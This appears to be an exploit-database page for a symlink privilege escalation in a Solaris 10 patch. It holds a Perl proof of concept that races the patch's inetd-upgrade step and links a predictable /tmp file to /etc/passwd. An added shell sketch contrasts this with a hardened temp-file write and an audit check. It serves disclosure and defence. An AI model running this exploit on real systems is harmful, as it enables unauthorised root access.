Solaris 10 Patch 137097-01 – Symlink Privilege Escalation

  • Author: Larry Cashdollar
    Date: 2012-08-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20418/
  • source: https://www.securityfocus.com/bid/54919/info
    
    Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. 
    
    Local attackers can exploit this issue to gain elevated privileges on affected computers.
    
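    #!/usr/bin/perl
    # File that the root-run patch step ends up writing to through the symlink.
    $clobber = "/etc/passwd";
    while(1) {
        # Poll the process table until the patch's inetd-upgrade step appears.
        open ps,"ps -ef | grep -v grep |grep -v PID |";

        while(<ps>) {
            @args = split " ", $_;    # $args[1] is the PID column of ps -ef

            if (/inetd-upgrade/) {
                print "Symlinking iconf_entries.$args[1] to $clobber\n";
                symlink($clobber,"/tmp/iconf_entries.$args[1]");
                exit(1);
            }
        }

    }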
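
The PoC relies on a root-run step writing to a predictable name, /tmp/iconf_entries.<PID>, in a shared directory. The sketch below is an added example, not code from the advisory or from the Solaris patch: it contrasts that pattern with a hardened form and adds an audit check for planted links. The function names are hypothetical, and the patch script's real write logic is not shown on this page, so `write_weak` is only an assumed stand-in for it.

```shell
#!/bin/sh
# Added example (constructed). Function names are hypothetical; the real
# patch script is not reproduced on this page.

# Weak pattern (assumed stand-in for the patch step): predictable name in a
# shared directory. A plain ">" redirect follows any symlink already present
# at that path, so the write lands on the link target.
write_weak() {             # $1 = shared directory, $2 = data
    printf '%s\n' "$2" > "$1/iconf_entries.$$"
}

# Hardened pattern: a private directory from mktemp -d (unpredictable name,
# mode 0700), plus noclobber (set -C) so the redirect fails instead of
# following or truncating anything that already exists at the path.
write_hardened() {         # $1 = shared directory, $2 = data; prints the path
    (
        umask 077
        work=$(mktemp -d "$1/iconf.XXXXXX") || exit 1
        set -C
        printf '%s\n' "$2" > "$work/iconf_entries" || exit 1
        printf '%s\n' "$work/iconf_entries"
    )
}

# Audit check: report symlinks in a shared directory whose name matches the
# scratch-file pattern seen in the PoC. Run it before and after patching.
find_planted_links() {     # $1 = directory to inspect
    find "$1" -type l -name 'iconf_entries.*' -print
}
```

On a host being patched, `find_planted_links /tmp` returning any path means the patch run should be stopped and the link's owner investigated.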